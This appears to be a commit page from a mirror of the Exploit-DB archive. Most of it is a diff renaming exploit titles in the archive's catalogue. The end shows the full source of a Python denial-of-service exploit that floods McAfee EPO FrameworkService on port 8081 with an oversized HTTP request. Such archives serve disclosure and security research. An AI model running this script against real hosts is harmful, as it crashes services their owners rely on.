bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-08-05

Browse source
This commit is contained in:
Offensive Security 2015-08-05 05:02:03 +00:00
parent 4378e58667
commit a6cc99bac3
16 changed files with 1430 additions and 1430 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

48
files.csv
View file

@ -459,7 +459,7 @@ id,file,description,date,author,platform,type,port
593,platforms/windows/dos/593.pl,"Quick 'n EasY 2.4 - Ftp Server Remote DoS",2004-10-24,KaGra,windows,dos,0
594,platforms/windows/dos/594.pl,"BaSoMail Server 1.24 POP3/SMTP Remote Denial of Service Exploit",2004-10-24,KaGra,windows,dos,0
598,platforms/windows/remote/598.py,"MailCarrier 2.51 - SMTP EHLO / HELO Buffer Overflow Exploit",2004-10-26,muts,windows,remote,25
599,platforms/windows/dos/599.py,"BaSoMail Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
599,platforms/windows/dos/599.py,"BaSoMail - Multiple Buffer Overflow Denial of Service Exploit",2004-10-26,muts,windows,dos,0
600,platforms/linux/local/600.c,"GD Graphics Library Heap Overflow Proof of Concept Exploit",2004-10-26,N/A,linux,local,0
601,platforms/linux/local/601.c,"libxml 2.6.12 nanoftp Remote Buffer Overflow Proof of Concept Exploit",2004-10-26,infamous41md,linux,local,0
602,platforms/sco/local/602.c,"SCO Openserver 5.0.7 (MMDF deliver) Local Root Exploit",2004-10-26,"Ramon Valle",sco,local,0
@ -510,7 +510,7 @@ id,file,description,date,author,platform,type,port
659,platforms/cgi/webapps/659.txt,"EZshopper - Directory Transversal (loadpage.cgi)",2004-11-25,"Zero X",cgi,webapps,0
660,platforms/linux/remote/660.c,"PHP <= 4.3.7/ 5.0.0RC3 memory_limit Remote Exploit",2004-11-27,"Gyan Chawdhary",linux,remote,80
662,platforms/windows/dos/662.pl,"3Dmax 6.x backburner Manager <= 2.2 - Denial of Service Exploit",2004-11-28,Xtiger,windows,dos,0
663,platforms/windows/remote/663.py,"Mercury Mail 4.01 (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
663,platforms/windows/remote/663.py,"Mercury Mail 4.01 - (Pegasus) IMAP Buffer Overflow Exploit",2004-11-29,muts,windows,remote,143
664,platforms/windows/dos/664.c,"WS_FTP Server <= 5.03 MKD Remote Buffer Overflow Exploit",2004-11-29,NoPh0BiA,windows,dos,0
665,platforms/windows/dos/665.c,"Orbz Game <= 2.10 - Remote Buffer Overflow Exploit",2004-11-29,"Luigi Auriemma",windows,dos,0
667,platforms/windows/dos/667.c,"Jana Server <= 2.4.4 (http/pna) Denial of Service Exploit",2004-11-30,"Luigi Auriemma",windows,dos,0
@ -1147,9 +1147,9 @@ id,file,description,date,author,platform,type,port
1375,platforms/windows/remote/1375.pl,"Mercury Mail Transport System 4.01b Remote Exploit (PH SERVER)",2005-12-16,kingcope,windows,remote,105
1376,platforms/windows/dos/1376.c,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (c)",2005-12-19,Kozan,windows,dos,0
1377,platforms/windows/dos/1377.pl,"Microsoft Windows IIS - Malformed HTTP Request Denial of Service Exploit (pl)",2005-12-19,kokanin,windows,dos,0
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
1378,platforms/windows/remote/1378.py,"MailEnable Enterprise Edition 1.1 - (EXAMINE) Buffer Overflow Exploit",2005-12-19,muts,windows,remote,0
1379,platforms/php/webapps/1379.php,"PHPGedView <= 3.3.7 - Arbitrary Remote Code Execution Exploit",2005-12-20,rgod,php,webapps,0
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
1380,platforms/windows/remote/1380.py,"Eudora Qualcomm WorldMail 3.0 - (IMAPd) Remote Overflow Exploit",2005-12-20,muts,windows,remote,143
1381,platforms/windows/remote/1381.pm,"Golden FTP Server <= 1.92 - (APPE) Remote Overflow Exploit (meta)",2005-12-20,redsand,windows,remote,21
1382,platforms/php/webapps/1382.pl,"phpBB <= 2.0.18 - Remote Bruteforce/Dictionary Attack Tool (updated)",2006-02-20,DarkFig,php,webapps,0
1383,platforms/php/webapps/1383.txt,"phpBB <= 2.0.18 - Remote XSS Cookie Disclosure Exploit",2005-12-21,jet,php,webapps,0
@ -1690,7 +1690,7 @@ id,file,description,date,author,platform,type,port
1982,platforms/php/webapps/1982.txt,"WonderEdit Pro CMS (template_path) - Remote File Include Vulnerabilities",2006-07-04,OLiBekaS,php,webapps,0
1983,platforms/php/webapps/1983.txt,"MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerability",2006-07-05,Kw3[R]Ln,php,webapps,0
1984,platforms/windows/dos/1984.py,"WinRAR <= 3.60 beta 6 (SFX Path) Stack Overflow Exploit PoC",2006-07-05,posidron,windows,dos,0
1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
1985,platforms/windows/local/1985.py,"WinRAR <= 3.60 beta 6 - (SFX Path) Local Stack Overflow Exploit",2006-07-05,muts,windows,local,0
1986,platforms/windows/local/1986.cpp,"Microsoft Excel 2000/2003 Hlink Local Buffer Overflow Exploit (french)",2006-07-06,NSRocket,windows,local,0
1987,platforms/asp/webapps/1987.txt,"Hosting Controller <= 6.1 Hotfix 3.1 Privilege Escalation Vulnerability",2006-07-06,"Soroush Dalili",asp,webapps,0
1988,platforms/windows/local/1988.pl,"Microsoft Excel 2003 Hlink Local Buffer Overflow Exploit (italian)",2006-07-06,oveRet,windows,local,0
@ -1951,7 +1951,7 @@ id,file,description,date,author,platform,type,port
2255,platforms/php/webapps/2255.txt,"eFiction < 2.0.7 - Remote Admin Authentication Bypass Vulnerability",2006-08-25,Vipsta,php,webapps,0
2256,platforms/php/webapps/2256.txt,"Integramod Portal <= 2.0 rc2 (phpbb_root_path) Remote File Include",2006-08-25,MATASANOS,php,webapps,0
2257,platforms/php/webapps/2257.txt,"CliServ Web Community <= 0.65 (cl_headers) Include Vulnerability",2006-08-25,Kacper,php,webapps,0
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
2258,platforms/windows/remote/2258.py,"MDaemon POP3 Server < 9.06 - (USER) Remote Heap Overflow Exploit",2006-08-26,muts,windows,remote,110
2259,platforms/php/webapps/2259.txt,"proManager <= 0.73 (note.php) Remote SQL Injection Vulnerability",2006-08-26,Kacper,php,webapps,0
2260,platforms/php/webapps/2260.pl,"AlberT-EasySite <= 1.0a5 (PSA_PATH) Remote File Include Exploit",2006-08-27,Kacper,php,webapps,0
2261,platforms/php/webapps/2261.php,"iziContents <= RC6 GLOBALS[] Remote Code Execution Exploit",2006-08-27,Kacper,php,webapps,0
@ -3274,7 +3274,7 @@ id,file,description,date,author,platform,type,port
3613,platforms/php/webapps/3613.txt,"phpBB MOD Forum picture and META tags 1.7 RFI Vulnerability",2007-03-30,bd0rk,php,webapps,0
3614,platforms/php/webapps/3614.txt,"JSBoard 2.0.10 (login.php table) Local File Inclusion Vulnerability",2007-03-30,GoLd_M,php,webapps,0
3615,platforms/linux/remote/3615.c,"dproxy-nexgen Remote Root Buffer Overflow Exploit (x86-lnx)",2007-03-30,mu-b,linux,remote,53
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
3616,platforms/windows/remote/3616.py,"IBM Lotus Domino Server 6.5 - PRE AUTH Remote Exploit",2007-03-31,muts,windows,remote,143
3617,platforms/windows/local/3617.cpp,"Microsoft Windows - Animated Cursor (.ANI) Stack Overflow Exploit",2007-03-31,devcode,windows,local,0
3618,platforms/php/webapps/3618.htm,"XOOPS Module Lykos Reviews 1.00 (index.php) SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
3619,platforms/php/webapps/3619.pl,"XOOPS Module Library (viewcat.php) Remote SQL Injection Exploit",2007-03-31,ajann,php,webapps,0
@ -3677,7 +3677,7 @@ id,file,description,date,author,platform,type,port
4024,platforms/windows/local/4024.rb,"DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit",2007-06-02,n00b,windows,local,0
4025,platforms/php/webapps/4025.php,"Quick.Cart <= 2.2 RFI/LFI Remote Code Execution Exploit",2007-06-02,Kacper,php,webapps,0
4026,platforms/php/webapps/4026.php,"PNphpBB2 <= 1.2 - (index.php c) Remote SQL Injection Exploit",2007-06-03,Kacper,php,webapps,0
4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
4027,platforms/windows/remote/4027.py,"IBM Tivoli Provisioning Manager - PRE AUTH Remote Exploit",2007-06-03,muts,windows,remote,8080
4028,platforms/linux/local/4028.txt,"screen 4.0.3 - Local Authentication Bypass Vulnerability (OpenBSD)",2008-06-18,Rembrandt,linux,local,0
4029,platforms/php/webapps/4029.php,"Sendcard <= 3.4.1 (Local File Inclusion) Remote Code Execution Exploit",2007-06-04,Silentz,php,webapps,0
4030,platforms/php/webapps/4030.php,"EQdkp <= 1.3.2 (listmembers.php rank) Remote SQL Injection Exploit",2007-06-04,Silentz,php,webapps,0
@ -4216,7 +4216,7 @@ id,file,description,date,author,platform,type,port
4570,platforms/multiple/local/4570.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit",2007-10-27,bunker,multiple,local,0
4571,platforms/multiple/local/4571.pl,"Oracle 10g/11g SYS.LT.FINDRICSET Local SQL Injection Exploit (2)",2007-10-27,bunker,multiple,local,0
4572,platforms/multiple/local/4572.txt,"Oracle 10g LT.FINDRICSET Local SQL Injection Exploit (IDS evasion)",2007-10-27,sh2kerr,multiple,local,0
4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581
4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143
4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 (include_path) Multiple RFI Vulnerabilities",2007-10-27,GoLd_M,php,webapps,0
4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php Remote SQL Injection Vulnerability",2007-10-28,ZynbER,php,webapps,0
@ -4299,7 +4299,7 @@ id,file,description,date,author,platform,type,port
4654,platforms/php/webapps/4654.txt,"PBLang <= 4.99.17.q Remote File Rewriting / Command Execution",2007-11-24,KiNgOfThEwOrLd,php,webapps,0
4655,platforms/php/webapps/4655.txt,"project alumni <= 1.0.9 - Remote XSS / SQL Injection Vulnerability",2007-11-24,tomplixsee,php,webapps,0
4656,platforms/php/webapps/4656.txt,"RunCMS <= 1.6 - Local File Inclusion Vulnerability",2007-11-24,BugReport.IR,php,webapps,0
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
4657,platforms/windows/remote/4657.py,"Apple QuickTime 7.2/7.3 - RTSP Response Universal Exploit (IE7/FF/Opera)",2007-11-26,muts,windows,remote,0
4658,platforms/php/webapps/4658.php,"RunCMS <= 1.6 disclaimer.php Remote File Overwrite Exploit",2007-11-25,BugReport.IR,php,webapps,0
4659,platforms/php/webapps/4659.txt,"IAPR COMMENCE 1.3 - Multiple Remote File Inclusion Vulnerability",2007-11-25,ShAy6oOoN,php,webapps,0
4660,platforms/php/webapps/4660.pl,"Softbiz Freelancers Script 1 - Remote SQL Injection Exploit",2007-11-25,IRCRASH,php,webapps,0
@ -4366,7 +4366,7 @@ id,file,description,date,author,platform,type,port
4721,platforms/php/webapps/4721.txt,"Wordpress <= 2.3.1 - Charset Remote SQL Injection Vulnerability",2007-12-11,"Abel Cheung",php,webapps,0
4722,platforms/php/webapps/4722.txt,"viart cms/shop/helpdesk 3.3.2 - Remote File Inclusion Vulnerability",2007-12-11,RoMaNcYxHaCkEr,php,webapps,0
4723,platforms/osx/dos/4723.c,"Apple Mac OS X xnu <= 1228.0 - super_blob Local kernel Denial of Service PoC",2007-12-12,mu-b,osx,dos,0
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
4724,platforms/windows/remote/4724.py,"HP OpenView Network Node Manager 07.50 - CGI Remote BoF Exploit",2007-12-12,muts,windows,remote,80
4725,platforms/php/webapps/4725.txt,"Fastpublish CMS 1.9999 config[fsBase] RFI Vulnerability",2007-12-12,RoMaNcYxHaCkEr,php,webapps,0
4726,platforms/php/webapps/4726.txt,"CityWriter 0.9.7 head.php Remote File Inclusion Vulnerability",2007-12-13,RoMaNcYxHaCkEr,php,webapps,0
4727,platforms/php/webapps/4727.txt,"CMS Galaxie Software (category_id) Remote SQL Injection Vulnerability",2007-12-13,MurderSkillz,php,webapps,0
@ -4974,8 +4974,8 @@ id,file,description,date,author,platform,type,port
5340,platforms/php/webapps/5340.txt,"RunCMS Module bamagalerie3 - Remote SQL Injection Vulnerability",2008-04-01,DreamTurk,php,webapps,0
5341,platforms/windows/dos/5341.pl,"Noticeware Email Server 4.6.1.0 - Denial of Service Exploit",2008-04-01,Ray,windows,dos,0
5342,platforms/windows/remote/5342.py,"HP OpenView NNM 7.5.1 - OVAS.exe SEH PRE AUTH Overflow Exploit",2008-04-02,muts,windows,remote,7510
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5343,platforms/windows/dos/5343.py,"Mcafee EPO 4.0 - FrameworkService.exe Remote Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5344,platforms/windows/dos/5344.py,"Novel eDirectory HTTP - Denial of Service Exploit",2008-04-02,muts,windows,dos,0
5345,platforms/php/webapps/5345.txt,"Joomla Component OnlineFlashQuiz <= 1.0.2 RFI Vulnerability",2008-04-02,NoGe,php,webapps,0
5346,platforms/windows/local/5346.pl,"XnView 1.92.1 Slideshow (FontName) Buffer Overflow Exploit",2008-04-02,haluznik,windows,local,0
5347,platforms/php/webapps/5347.txt,"DaZPHP 0.1 (prefixdir) Local File Inclusion Vulnerability",2008-04-02,w0cker,php,webapps,0
@ -5092,7 +5092,7 @@ id,file,description,date,author,platform,type,port
5459,platforms/php/webapps/5459.txt,"e107 module 123 flash chat 6.8.0 - Remote File Inclusion Vulnerability",2008-04-17,by_casper41,php,webapps,0
5460,platforms/windows/dos/5460.html,"Microsoft Works 7 WkImgSrv.dll ActiveX Denial of Service PoC",2008-04-17,"Shennan Wang",windows,dos,0
5461,platforms/windows/remote/5461.rb,"Intel Centrino ipw2200BG Wireless Driver Remote BoF Exploit (meta)",2008-04-17,oveRet,windows,remote,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
5462,platforms/windows/local/5462.py,"DivX Player 6.6.0 - .SRT File SEH Buffer Overflow Exploit",2008-04-18,muts,windows,local,0
5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0
5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0
5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0
@ -6951,7 +6951,7 @@ id,file,description,date,author,platform,type,port
7407,platforms/php/webapps/7407.txt,"Webmaster Marketplace (member.php u) SQL Injection Vulnerability",2008-12-10,"Hussin X",php,webapps,0
7408,platforms/php/webapps/7408.txt,"living Local 1.1 (xss-rfu) Multiple Vulnerabilities",2008-12-10,Bgh7,php,webapps,0
7409,platforms/php/webapps/7409.txt,"Pro Chat Rooms 3.0.2 (XSS/CSRF) Multiple Vulnerabilities",2008-12-10,ZynbER,php,webapps,0
7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (vista) (0day)",2008-12-10,muts,windows,remote,0
7410,platforms/windows/remote/7410.htm,"Microsoft Internet Explorer - XML Parsing Buffer Overflow Exploit (Vista) (0day)",2008-12-10,muts,windows,remote,0
7411,platforms/php/webapps/7411.txt,"Butterfly Organizer 2.0.1 (view.php id) SQL Injection Vulnerability",2008-12-10,Osirys,php,webapps,0
7412,platforms/asp/webapps/7412.txt,"cf shopkart 5.2.2 (sql/dd) Multiple Vulnerabilities",2008-12-10,AlpHaNiX,asp,webapps,0
7413,platforms/asp/webapps/7413.pl,"CF_Calendar (calendarevent.cfm) Remote SQL Injection Exploit",2008-12-10,AlpHaNiX,asp,webapps,0
@ -9020,7 +9020,7 @@ id,file,description,date,author,platform,type,port
9554,platforms/windows/dos/9554.html,"Apple iPhone 2.2.1/3.x (MobileSafari) Crash & Reboot Exploit",2009-08-31,TheLeader,windows,dos,0
9555,platforms/php/webapps/9555.txt,"Mybuxscript PTC-BUX (spnews.php) SQL Injection Vulnerability",2009-08-31,HxH,php,webapps,0
9556,platforms/php/webapps/9556.php,"osCommerce Online Merchant 2.2 RC2a Code Execution Exploit",2009-08-31,flyh4t,php,webapps,0
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
9559,platforms/windows/remote/9559.pl,"Microsoft IIS 5.0 - FTP Server Remote Stack Overflow Exploit (win2k sp4)",2009-09-01,muts,windows,remote,21
9560,platforms/windows/local/9560.txt,"Soritong MP3 Player 1.0 - (.m3u/UI.txt) Universal Local BoF Exploits",2009-09-01,hack4love,windows,local,0
9561,platforms/windows/dos/9561.py,"AIMP2 Audio Converter <= 2.53b330 - (.pls/.m3u) Unicode Crash PoC",2009-09-01,mr_me,windows,dos,0
9562,platforms/asp/webapps/9562.txt,"JSFTemplating / Mojarra Scales / GlassFish - File Disclosure Vulnerabilities",2009-09-01,"SEC Consult",asp,webapps,0
@ -12519,7 +12519,7 @@ id,file,description,date,author,platform,type,port
14232,platforms/php/webapps/14232.txt,"Joomla JPodium Component (com_jpodium) SQL Injection Vulnerability",2010-07-05,RoAd_KiLlEr,php,webapps,0
14233,platforms/php/webapps/14233.txt,"Bs Auction Script SQL Injection Vulnerability",2010-07-05,Sid3^effects,php,webapps,0
14234,platforms/linux/shellcode/14234.c,"125 bind port to 6778 XOR encoded polymorphic linux shellcode .",2010-07-05,gunslinger_,linux,shellcode,0
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 Admin Interface DoS",2010-07-06,muts,windows,dos,8800
14236,platforms/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface DoS",2010-07-06,muts,windows,dos,8800
14235,platforms/linux/shellcode/14235.c,"nc -lp 31337 -e /bin//sh polymorphic linux shellcode (91 bytes)",2010-07-05,gunslinger_,linux,shellcode,0
14237,platforms/php/webapps/14237.txt,"IBM Bladecenter Management - Multiple Web application vulnerabilities",2010-07-06,"Alexey Sintsov",php,webapps,0
14238,platforms/php/webapps/14238.txt,"BS Auction <= SQL Injection Vulnerability Exploit",2010-07-06,"Easy Laster",php,webapps,0
@ -17259,7 +17259,7 @@ id,file,description,date,author,platform,type,port
19899,platforms/cgi/dos/19899.txt,"UltraBoard 1.6 DoS Vulnerability",2000-05-05,"Juan M. Bello Rivas",cgi,dos,0
19900,platforms/linux/local/19900.c,"RedHat Linux 6.0/6.1/6.2 pam_console Vulnerability",2000-05-03,"Michal Zalewski",linux,local,0
19901,platforms/hardware/remote/19901.txt,"Netopia R-series routers 4.6.2 Vulnerability",2000-05-16,"Stephen Friedl",hardware,remote,0
20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
20010,platforms/php/webapps/20010.txt,"X-Cart Gold 4.5 - (products_map.php symb parameter) XSS Vulnerability",2012-07-21,muts,php,webapps,0
19906,platforms/multiple/remote/19906.txt,"Matt Wright FormMail 1.6/1.7/1.8 Environmental Variables Disclosure Vulnerability",2000-05-10,"Black Watch Labs",multiple,remote,0
19907,platforms/windows/dos/19907.txt,"Microsoft IIS 4.0/5.0 Malformed File Extension DoS Vulnerability",2000-05-11,"Ussr Labs",windows,dos,0
19908,platforms/windows/remote/19908.txt,"Microsoft IIS 4.0/5.0 Malformed Filename Request Vulnerability",2000-05-11,"Cerberus Security Team",windows,remote,0
@ -17379,17 +17379,17 @@ id,file,description,date,author,platform,type,port
20030,platforms/unix/remote/20030.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (1)",1999-10-15,tf8,unix,remote,0
20031,platforms/linux/remote/20031.c,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (2)",2000-09-26,vsz_,linux,remote,0
20032,platforms/lin_x86/remote/20032.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0 - Remote Format String Stack Overwrite (3)",2001-05-04,justme,lin_x86,remote,0
20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
20033,platforms/php/webapps/20033.py,"Dell SonicWALL Scrutinizer 9.0.1 - (statusFilter.php q parameter) SQL Injection",2012-07-22,muts,php,webapps,0
20035,platforms/asp/webapps/20035.js,"ipswitch whatsup gold 15.02 - Stored XSS - blind SQLi - rce",2012-07-22,muts,asp,webapps,0
20036,platforms/windows/local/20036.pl,"Photodex ProShow Producer 5.0.3256 - Local Buffer Overflow Exploit",2012-07-23,mr.pr0n,windows,local,0
20037,platforms/linux/webapps/20037.txt,"Atmail WebAdmin and Webmail Control Panel SQL Root Password Disclosure",2012-07-23,Ciph3r,linux,webapps,0
20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
20038,platforms/linux/webapps/20038.py,"Symantec Web Gateway 5.0.2 - (blocked.php id parameter) Blind SQL Injection",2012-07-23,muts,linux,webapps,0
20039,platforms/windows/dos/20039.java,"LeafDigital LeafChat 1.7 DoS Vulnerability",2000-06-25,"MDMA Crew",windows,dos,0
20040,platforms/windows/remote/20040.c,"SapporoWorks WinProxy 2.0/2.0.1 - Buffer Overflow Vulnerability",2000-06-27,UNYUN,windows,remote,0
20041,platforms/cgi/remote/20041.txt,"Flowerfire Sawmill 5.0.21 File Access Vulnerability",2000-06-26,"Larry W. Cashdollar",cgi,remote,0
20042,platforms/unix/local/20042.c,"Flowerfire Sawmill 5.0.21 Weak Password Encryption Vulnerability",2000-06-26,"Larry W. Cashdollar",unix,local,0
20043,platforms/linux/remote/20043.c,"DALnet Bahamut IRCd 4.6.5 - _SUMMON_ Buffer Overflow Vulnerability",2000-06-29,"Matt Conover",linux,remote,0
20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
20044,platforms/php/webapps/20044.txt,"Symantec Web Gateway 5.0.3.18 - Blind SQLi Backdoor via MySQL Triggers",2012-07-23,muts,php,webapps,0
20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0
20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0
20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
@ -17406,7 +17406,7 @@ id,file,description,date,author,platform,type,port
20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 Internal Variable Override Vulnerability",2000-07-04,"Adrian Daminato",cgi,remote,0
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - _/INVITE_ Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0
20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 - Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0
@ -17431,7 +17431,7 @@ id,file,description,date,author,platform,type,port
20085,platforms/cgi/remote/20085.txt,"Computer Software Manufaktur Alibaba 2.0 Piped Command Vulnerability",2000-07-18,Prizm,cgi,remote,0
20086,platforms/windows/remote/20086.c,"OReilly Software WebSite Professional 2.3.18/2.4/2.4.9 - 'webfind.exe' Buffer Overflow",2000-06-01,"Robert Horton",windows,remote,0
20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0
20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0
20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0
20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0
@ -17696,7 +17696,7 @@ id,file,description,date,author,platform,type,port
20365,platforms/php/webapps/20365.py,"Wordpress Plugin ThreeWP Email Reflector 1.13 - Stored XSS",2012-08-08,loneferret,php,webapps,0
20366,platforms/windows/webapps/20366.py,"winwebmail server 3.8.1.6 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
20367,platforms/windows/webapps/20367.py,"xeams email server 4.4 build 5720 - Stored XSS",2012-08-08,loneferret,windows,webapps,0
20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 POST File Read",2012-08-08,muts,windows,webapps,0
20368,platforms/windows/webapps/20368.py,"IBM Proventia Network Mail Security System 2.5 - POST File Read",2012-08-08,muts,windows,webapps,0
20369,platforms/hardware/remote/20369.sh,"Cisco PIX Firewall 5.2 PASV Mode FTP Internal Address Disclosure Vulnerability",2000-10-03,"Fabio Pietrosanti",hardware,remote,0
20370,platforms/cgi/remote/20370.txt,"Kootenay Web Inc whois 1.0 - Remote Command Execution Vulnerability",2000-10-29,"Mark Stratman",cgi,remote,0
20371,platforms/windows/remote/20371.txt,"Microsoft Windows 95/WfW smbclient Directory Traversal Vulnerability",1995-10-30,"Dan Shearer",windows,remote,0

Can't render this file because it is too large.

150
platforms/windows/dos/5343.py
View file

@ -1,75 +1,75 @@
#!/usr/bin/python
# Mcafee EPO 4.0 (and others) FrameworkService.exe DOS
# More than meets the eye
# Discovered and coded by Mati Aharoni
# muts..at..offensive-security.com
# http://www.offensive-security.com/0day/mcafee_again.py.txt
# EAX 00840C30
# ECX 00837830
# EDX 01EACF18
# EBX 00004000
# ESP 01EAFF04
# EBP 01EAFF38
# ESI 00837830
# EDI 643AC780 naCmnLib.CnaLogger::AddMessageA
# EIP 42424242
import socket
import os
import sys
from time import sleep
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
expl.connect ( ( sys.argv[1], 8081 ) )
buff="B"*96000+" HTTP/1.1\r\n"
req= buff+ "+'/spin//AVClient//AVClient.csp HTTP/1.1\r\nHost: 192.168.1.10:20\r\n\r\n\r\n"
expl.send (req)
#data=expl.recv(1024)
#print data
expl.close()
